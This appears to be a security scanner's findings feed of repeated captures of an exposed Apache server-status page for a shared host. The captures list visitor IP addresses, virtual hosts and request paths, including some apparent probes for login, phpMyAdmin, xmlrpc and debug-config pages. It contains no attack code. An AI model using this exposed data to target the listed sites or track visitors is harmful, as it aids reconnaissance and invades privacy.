      31.166.95.80http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/BDrIjQo9dii8CC8pflYF2L
      
      0-8134760/164/6067_
      12.2688039459770.06.25565.74
      91.92.246.123http/1.1thenewjeddah.com:80POST /wp-plain.php HTTP/1.1
      
      0-8134760/130/5516_
      12.02811644804850.021.331076.00
      64.225.75.246http/1.1
      
      0-8134760/73/5396_
      12.1857043546475700.07.69930.40
      104.28.234.178http/1.1albayan.edu.sa:443GET /imgweb/qb39/6/eng11.pdf HTTP/1.1
      
      0-8134760/77/5584_
      12.12859366343460.08.66736.89
      37.224.171.225http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/SSQMRImNHumaxA5ZoZENHk
      
      0-8134760/75/5441_
      12.2617812526837790.027.71778.24
      5.82.26.73http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B5%D9%88%D8%B1%D8%A9%20%D9%88%D8%A7%D8%AA%
      
      0-8134760/131/5300_
      12.2023262731348780.04.16864.06
      107.189.5.180http/1.1zed.sa:443GET /wp-login.php HTTP/1.1
      
      0-8134760/97/5445_
      12.148522069927730.055.94872.96
      66.249.76.64http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-8134760/64/5614_
      12.19390729650280.07.39850.21
      128.199.231.228http/1.1proxy-subdomains-vhost.localhosGET /wordpress/ HTTP/1.1
      
      0-8134760/144/5635_
      12.1186546338637060.03.10709.16
      37.224.171.225http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8134760/87/5258_
      12.17616111203788920.03.70707.26
      78.95.60.151http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-8134760/84/5566_
      12.0480134663070.09.62771.92
      64.225.75.246http/1.1
      
      0-8134760/80/5417_
      12.274210337025970.04.39942.21
      172.69.103.142http/1.1sibaqulhorof.com:443POST /api/v1/app/general/fcm_token_store HTTP/1.1
      
      0-8134760/73/5637_
      12.16737233527930.08.02698.24
      37.224.171.225http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8134760/74/5631_
      12.20255832163540.09.01949.52
      51.36.76.200http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      1-8113790/86/4765_
      13.2534610961024570.023.91959.73
      85.208.96.199http/1.1sulaimaniya.edu.sa:443GET /robots.txt HTTP/1.1
      
      1-8113790/96/5188_
      13.1486613153601600.05.88871.71
      37.224.171.225http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-8113790/166/5532_
      13.31181242227860.022.18873.81
      31.166.95.80http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/__________%20_________
      
      1-8113790/71/5447_
      13.343037139490.021.73720.96
      128.199.231.228http/1.1proxy-subdomains-vhost.localhosGET /wordpress/ HTTP/1.1
      
      1-8113790/70/4952_
      13.14857051843410.013.84871.82
      66.249.69.98http/1.1albayan.edu.sa:80GET /imgweb/files41/bank/%D9%84%D8%BA%D8%AA%D9%8A55.pdf HTTP/1.
      
      1-8113790/97/5278_
      13.245824838806700.05.60748.60
      66.249.76.228http/1.1albayan.edu.sa:443GET /imgweb/matweya.pdf HTTP/1.1
      
      1-8113790/91/5246_
      13.32187114168761670.034.67925.54
      107.189.5.180http/1.1zed.sa:80GET /?author=1 HTTP/1.1
      
      1-8113790/117/5
      Found on 2024-06-01 05:21
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df75010e091

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 08:29:38 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 4 hours 24 minutes 48 seconds
      Server load: 0.03 0.08 0.10
      Total accesses: 975067 - Total Traffic: 141.3 GB - Total Duration: 1088808208
      CPU Usage: u500.95 s54.81 cu4151.94 cs930.83 - .908% CPU load
      1.57 requests/sec - 238.8 kB/second - 152.0 kB/request - 1116.65 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 234 idle workers
      ____________K____R_______________K_____________K______R_________
      ______W_____________________R____________KK__________________WWW
      WWWWWWWWWWWWWWWWWWWWWW___________________K__K__________K________
      _____K___________________R_________K____________________________
      _________________K_.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/248/4851_
      26.212436033626760.021.63645.46
      135.148.136.205http/1.1daris.live:80GET /mysql/index.php?lang=en HTTP/1.1
      
      0-6131530/196/4179_
      26.563721718683370.07.53542.85
      176.47.11.174http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-6131530/220/4557_
      26.36133821537110.010.01631.73
      5.82.188.97http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-6131530/194/4342_
      26.222400350707540.023.16566.35
      176.47.11.174http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-6131530/198/4430_
      26.481064144929630.018.58728.51
      176.47.11.174http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-6131530/197/4210_
      26.20245435180240.050.48715.91
      178.86.31.106http/1.1jawad.com.sa:443GET /public/front_resources/vue/contact.js HTTP/1.1
      
      0-6131530/186/4393_
      26.5442334146470.012.72573.43
      5.110.43.147http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=3.2.1 HTTP/1.1
      
      0-6131530/215/4170_
      26.35157910726166630.018.56645.04
      51.39.93.5http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-6131530/162/4824_
      26.2423026936708740.052.81768.51
      178.86.31.106http/1.1jawad.com.sa:443GET /public/front_resources/js/jquery-ui.js HTTP/1.1
      
      0-6131530/160/4292_
      26.3712723129202160.031.68806.77
      5.82.188.97http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-6131530/179/4005_
      26.534831225790600.08.84511.63
      176.47.11.174http/1.1jawad.com.sa:443POST /api/v.1/front/contact/list HTTP/1.1
      
      0-6131530/236/4914_
      26.501014824965660.010.43436.63
      176.47.11.174http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-6131532/214/4376K
      26.58215372665424.034.25942.23
      51.39.31.20http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-6131530/221/4438_
      26.2619664526287360.015.53783.20
      173.212.245.223http/1.1zed.sa:443POST /xmlrpc.php HTTP/1.1
      
      0-6131530/195/4539_
      26.22239936118330.08.66581.81
      37.106.69.155http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-6131530/193/4234_
      26.52655921144250.09.16633.56
      66.249.64.14http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1415&l_n=1&page=1 HTTP
      
      0-6131530/199/4157_
      26.2523134723439590.030.30741.98
      176.47.11.174http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-6131530/181/4383R
      26.222462418648793780.015.98649.09
      176.47.11.174http/1.1jawad.com.sa:443
      
      0-6131530/196/4616_
      26.202455623136900.03.86687.74
      135.148.136.205http/1.1daris.live:80GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
      
      0-6131530/199/4413_
      26.51841531868810.013.04561.10
      176.47.11.174http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-6131530/208/4217_
      26.26210102200124130.072.33581.21
      176.47.11.174http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-6131530/207/4421_
      26.5624822416860.05.94623.01
      95.108.213.82http/1.1alnwisher.com:443GET /Products_view.php?i=222 HTTP/1.1
      
      0-6131530/348/4441_
      26.44110528369780.063.32725.09
      51.39.31.20http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      0-6131530/192/4525_
      26.411132425694780.031.19588.64
      176.47.11.174http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-6131530/175/4451_
      26.49105324320340.019.00722.17
      176.47.11.174http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-6135160/174/3835_
      24.0148341436890.04.22762.10
      176.47.11.174http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      1-6135160/186/4164_
      24.0324140526250.06.38672.06
      95.108.213.229http/1.1alnwisher.com:443GET /robots.txt HTTP/1.1
      
      1-6135160/178/4407_
      23.56245433247490.012.46692.14
      178.86.31.106http/1.1jawad.com.sa:443GET /public/front_resources/js/script.js HTTP/1.1
      
      1-6135160/169/4277_
      23.62197231290730.04.63615.21
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717046781.00310707092285156250
      
      1-6135160/184/4123_
      23.931091431875250.059.11623.98
      176.47.11.174http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      1-6135160/147/3987_
      23.57233123542630.072.57587.31
      176.47.11.174http/1.1jawad.com.sa:443GET /public/front_resources/vue/contact.js HTTP/1.1
      
      1-6135160/218/4217_
      23.592052515126
      Found on 2024-05-30 05:29
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7475da134

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 05:22:35 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 1 hour 17 minutes 45 seconds
      Server load: 0.00 0.01 0.05
      Total accesses: 948316 - Total Traffic: 139.0 GB - Total Duration: 1080495457
      CPU Usage: u380.88 s32.19 cu4151.94 cs930.83 - .902% CPU load
      1.56 requests/sec - 239.1 kB/second - 153.7 kB/request - 1139.38 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      ______________________W_________________________________________
      _______K__________________K____________________K_____________WWW
      WWWWWWWWWWWWWWWWWWWWWW________K_________________K_______________
      _____________________________K______________K___________________
      ___________________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/117/4720_
      11.87497333489320.016.91640.74
      37.104.1.135http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-6131530/97/4080_
      12.1322918597750.03.94539.27
      40.77.190.57http/1.1jawad.com.sa:443GET /api/v.1/front/rating/like HTTP/1.1
      
      0-6131530/72/4409_
      11.837208921424910.00.82622.54
      66.249.70.128http/1.1daris.live:80GET /chanel/Android%20World HTTP/1.1
      
      0-6131530/94/4242_
      11.962525350605200.020.15563.34
      212.62.97.85http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/BDrIjQo9dii8CC8pflYF2L
      
      0-6131530/76/4308_
      11.81837244806240.08.31718.24
      66.249.64.14http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A7%D8%B
      
      0-6131530/79/4092_
      12.0883435085630.017.82683.26
      17.22.253.179http/1.1jawad.com.sa:443GET /public/front_resources/css/font-awesome.min.css HTTP/1.1
      
      0-6131530/99/4306_
      11.93271933948700.09.90570.60
      52.230.152.174http/1.1alnwisher.com:443GET / HTTP/1.1
      
      0-6131530/106/4061_
      11.90371025763570.05.64632.11
      216.244.66.198http/1.1albayan.edu.sa:80GET /robots.txt HTTP/1.1
      
      0-6131530/70/4732_
      12.1211334761660.011.34727.04
      77.90.194.113http/1.1sulaimaniya.edu.sa:443GET /wp-content/themes/kids-world/images/title-bg-right.png HTT
      
      0-6131530/66/4198_
      11.913204829016410.029.39804.47
      66.249.64.12http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1396&l_n=1&page=0 HTTP
      
      0-6131530/85/3911_
      11.837582310225693820.02.18504.96
      51.253.140.113http/1.1albayan.edu.sa:443GET /imgweb/1445/%EF%BF%BD%EF%BF%BD%D8%A7%D8%B3%D8%A6%D9%84%D8%
      
      0-6131530/117/4795_
      12.0964524901080.06.37432.57
      114.119.150.168http/1.1jawad.com.sa:443GET /robots.txt HTTP/1.1
      
      0-6131530/103/4265_
      11.351468137102190.09.70917.69
      68.183.134.205http/1.1
      
      0-6131530/98/4315_
      11.84686126026980.04.22771.89
      66.249.70.165http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-6131530/82/4426_
      11.856262135889550.04.98578.13
      66.249.70.163http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1107 HTTP/1.1
      
      0-6131530/91/4132_
      11.55152221010900.03.36627.75
      77.90.194.113http/1.1
      
      0-6131530/78/4036_
      11.9824112323368010.025.97737.65
      212.62.97.85http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-6131530/89/4291_
      12.0522818747960580.09.34642.44
      77.90.194.113http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2016/01/rsz_img_20210824_175308.jpg HTT
      
      0-6131530/86/4506_
      11.90411123002730.01.34685.22
      204.101.161.19http/1.1albayan.edu.sa:443GET /e_sch/js/jquery.modern-ticker.min.js HTTP/1.1
      
      0-6131530/104/4318_
      11.855661331758850.02.97551.03
      66.249.70.165http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=227 HTTP/1.1
      
      0-6131530/124/4133_
      11.8945320199792920.019.03527.91
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-6131530/75/4289_
      12.0711030920521530.01.76618.84
      77.90.194.113http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/10/WhatsApp-Image-2021-09-05-at-12
      
      0-6131530/212/4305W
      11.800027163180.050.95712.72
      172.69.150.130http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-6131530/77/4410_
      11.561471525490110.013.78571.23
      68.183.134.205http/1.1
      
      0-6131530/71/4347_
      11.98238224121920.07.23710.40
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717035517.34671688079833984375
      
      1-6135160/78/3739_
      10.2113516041342920.01.54759.43
      77.90.194.113http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2016/02/sample-default-services.jpg HTT
      
      1-6135160/81/4059_
      10.05317340434770.01.79667.46
      37.236.86.58http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      1-6135160/87/4316_
      10.10253532240930.09.95689.63
      212.62.97.85http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      1-6135160/80/4188_
      10.05272030963750.02.90613.48
      66.249.64.8http/1.1albayan.edu.sa:80GET /imgweb/book/wabelsaeb.pdf HTTP/1.1
      
      1-6135160/84/4023_
      9.9570949231762130.015.90580.77
      51.253.186.103http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%94%D8%B3%D9%8A%
      
      1-6135160/61/3901_
      10.1916930923448410.069.85584.59
      66.249.64.1http/1.1albayan.edu.sa:443GET /imgweb/1445/4%20-%20%D8%A7%D9%84%D8%B9%D9%84%D9%88%D9%85.p
      
      1-6135160/104/4103_
      9.966851351173940.011.29670.73
      66.249.70.163http/1.1albayan.edu.sa:443
      Found on 2024-05-30 02:22
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df713518d0b

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 00:57:47 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  6 days 20 hours 52 minutes 57 seconds
      Server load: 0.25 0.13 0.08
      Total accesses: 931262 - Total Traffic: 136.5 GB - Total Duration: 1069769763
      CPU Usage: u307.82 s17.27 cu4139.75 cs928.21 - .909% CPU load
      1.57 requests/sec - 241.1 kB/second - 153.7 kB/request - 1148.73 ms/request
      13 requests currently being processed, 0 workers gracefully restarting, 112 idle workers
      _____W___________K_______........................._____W________
      __KKW___________W_________KK________.........................WWW
      WWWWWWWWWWWWWWWWWWWWWW________________KC_______.................
      ................................._______________KK________......
      .....................................................W..........
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/2/4605_
      0.10143633161360.00.01623.83
      52.230.152.250http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/2/3985_
      0.11131618550480.00.01535.33
      52.230.152.250http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-numberAnimate
      
      0-6131530/2/4339_
      0.2023321395640.00.02621.73
      52.230.152.250http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/1/4149_
      0.121234350245220.00.00543.18
      52.230.152.250http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/1/4233_
      0.12111344609100.00.00709.94
      52.230.152.250http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/0/4013W
      0.0010034815850.00.00665.43
      82.167.64.237http/1.1albayan.edu.sa:443GET /imgweb/file44/ccc5f57b-GE-ME-K07-SM2-MATH.pdf HTTP/1.1
      
      0-6131530/3/4210_
      0.1489831919710.00.03560.74
      146.70.187.81http/1.1zed.brunch.ws:443GET /img/favicon/favicon-196x196.png HTTP/1.1
      
      0-6131530/1/3956_
      0.0620269125645900.01.95628.43
      94.98.25.142http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-6131530/1/4663_
      0.148934649690.00.00715.69
      52.230.152.250http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/1/4133_
      0.1572328889300.00.00775.09
      52.230.152.250http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-block-ui/asse
      
      0-6131530/1/3827_
      0.15631225560580.00.00502.78
      52.230.152.250http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-block-ui/asse
      
      0-6131530/1/4679_
      0.174024813630.00.00426.20
      104.248.150.85http/1.1jawad.com.sa:80GET /wp-includes/wlwmanifest.xml HTTP/1.1
      
      0-6131530/2/4164_
      0.1842137024250.00.02908.00
      104.248.150.85http/1.1jawad.com.sa:443GET /wp-includes/wlwmanifest.xml HTTP/1.1
      
      0-6131530/2/4219_
      0.1833425911700.00.01767.68
      52.230.152.250http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/2/4346_
      0.2011435846880.00.00573.15
      52.230.152.250http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/2/4043_
      0.2201120891680.00.02624.42
      104.248.150.85http/1.1jawad.com.sa:443GET /misc/ajax.js HTTP/1.1
      
      0-6131530/2/3960_
      0.2202823223540.00.00711.68
      52.230.152.250http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131531/2/4204K
      0.230147893260.80.01633.11
      172.68.194.187http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-6131530/1/4421_
      0.08221622966200.00.00683.88
      52.230.152.250http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-numberAnimate
      
      0-6131530/1/4215_
      0.08211631685100.00.00548.07
      52.230.152.250http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/1/4010_
      0.081935199217220.00.00508.89
      52.230.152.250http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/1/4215_
      0.08183920477370.00.00617.08
      52.230.152.250http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/1/4094_
      0.09171627055890.00.00661.77
      52.230.152.250http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/1/4334_
      0.1012223514320.00.02557.47
      51.36.221.133http/1.1albayan.edu.sa:443GET /e_sch/css/style.css HTTP/1.1
      
      0-6131530/1/4277_
      0.10163024053740.00.00703.17
      52.230.152.250http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-5-0/0/3661.
      0.00321541296180.00.00757.89
      52.230.152.250http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-5-0/0/3978.
      0.00321737676050.00.00665.67
      52.230.152.20http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-5-0/0/4229.
      0.00321632024460.00.00679.68
      52.230.152.250http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-5-0/0/4108.
      0.00321230819520.00.00610.58
      52.230.152.20http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-5-0/0/3939.
      0.0032131634780.00.00564.87
      104.248.150.85http/1.1alnwisher.com:80GET /administrator/index.php HTTP/1.1
      
      1-5-0/0/3840.
      0.00329523342740.00.00514.74
      104.164.173.201http/1.1zed.brunch.ws:443GET / HTTP/1.1
      
      1-5-0/0/3999.
      0.00321751088570.00.00659.44
      52.230.152.250http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-5-0/0/3979.
      0.0032031845500.00.00551.87
      92.118.39.240http/1.1zed.brunch.ws:80GET /js/scripts.js HTTP/1.1
      
      1-5-0/0/3705.
      0.00321833928380.00.00
      Found on 2024-05-29 21:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7245ebdec

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 29-May-2024 23:11:34 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  6 days 19 hours 6 minutes 45 seconds
      Server load: 0.07 0.07 0.05
      Total accesses: 918339 - Total Traffic: 135.3 GB - Total Duration: 1023595676
      CPU Usage: u349.88 s27.21 cu4015.47 cs875.86 - .897% CPU load
      1.56 requests/sec - 241.6 kB/second - 154.5 kB/request - 1114.62 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      _________K______________R__________K____________________________
      _____K__________________K___________.................W.......WWW
      WWWWWWWWWWWWWWWWWWWWWW_______K_______________________W__C_______
      ______________________________________________K___________......
      ............................................____________________
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5269680/47/4509_
      8.2154732583990.01.12619.04
      188.114.102.97http/1.1qr.brunch.ws:443GET /storage/food_image/17096788308104_apple.webp HTTP/1.1
      
      0-5269680/69/3943_
      8.0321218490440.014.85535.18
      169.148.20.179http/1.1
      
      0-5269680/46/4236_
      8.29281721328480.029.30618.57
      52.230.152.172http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-5269680/69/4104_
      8.26535350063250.04.75541.26
      188.114.102.117http/1.1qr.brunch.ws:443GET /storage/vendor_settings/17085246857302_group6395.png HTTP/
      
      0-5269680/64/4180_
      8.1755144498150.04.83705.83
